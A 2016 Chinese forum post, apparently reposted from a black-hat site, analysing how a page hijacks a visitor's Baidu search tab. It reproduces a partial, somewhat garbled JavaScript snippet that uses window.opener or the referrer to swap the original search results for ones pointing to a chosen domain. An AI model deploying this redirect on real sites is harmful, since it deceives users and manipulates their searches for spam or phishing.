开发者俱乐部

标题: 百度搜索关键词搜索点击本地浏览器劫持 [打印本页]

作者: true    时间: 2016-8-23 01:25
标题: 百度搜索关键词搜索点击本地浏览器劫持



百度搜索关键词点击后自动更换替换掉原有搜索结果分析(好几年前了,还是有很多人在用)

这个技术的话不是什么难的技术,不懂得人说百度被劫持了。其实只不过是本地执行了个js的脚本替换了下搜索结果而已。没什么大惊小怪。而且这种站点只能做黑帽。做白帽的用这种技术,百度发现会直接屏蔽掉这个站点。

下面看分析:

1、正常搜索一个关键词注意我们的网站地址!



2、点进去这个关键词url之后的网站。



3、切换到之前的选项卡里面,查看下地址框!



本地百度被替换掉了。这就是所谓的劫持。其实是本地浏览器被更改了。

4、我们分析下这个网站的源码:


不难发现有个特殊的javascript 的。而且不正常的东西。


5、点进去看下就会知道原因了。代码都在里面。



代码我备注一份吧。留着大家分享下。

  1. var eg=[["www.google.com.hk/","&safe;=strict&sitesearch;=","",""],["www.google.com.tw/","&safe;=strict&sitesearch;=","",""],["www.google.com/","&safe;=strict&sitesearch;=","",""],["209.116.186.217/","&safe;=strict&sitesearch;=","",""],["www.baidu.com/","&ct;=2097152&tn;=0051&si;=","baidu","baidu.com"],["www.haosou.com/","&rg;=1&site;=","haosou","haosou.com"],["cn.bing.com/","&rg;=1&site;=","",""],["sg.search.yahoo.com/","&site;=","",""],["www.youdao.com/","&site;=","",""],["www.sogou.com/","&site;=","sogou","sogou.com"],["www.soso.com/","&site;=","",""]];
  2. var p=undefined;
  3. try{if(window.opener)
  4. {p=window.opener.location.href.toLowerCase();}
  5. }
  6. catch(e){}if(!p){p=document.referrer.toLowerCase();}
  7. for(i=0;i0)
  8. {var t=p+eg[i][1]+"www.fzleim.com";
  9. if(eg[i][0]=="www.baidu.com/")
  10. {var arr = /&wd;\=.*/.exec(p);
  11. var keyword='';
  12. if(arr!=null && arr.length>0){keyword = arr[0].replace("&wd;=","")};
  13. t='http://www.baidu.com/s?ct=2097152&ie;=UTF-8&cl;=3&wd;='+ keyword +'&si;=www.fzleim.com'};
  14. var jump_value = '';
复制代码


来自:黑帽网






欢迎光临 开发者俱乐部 (http://xodn.com/) Powered by Discuz! X3.2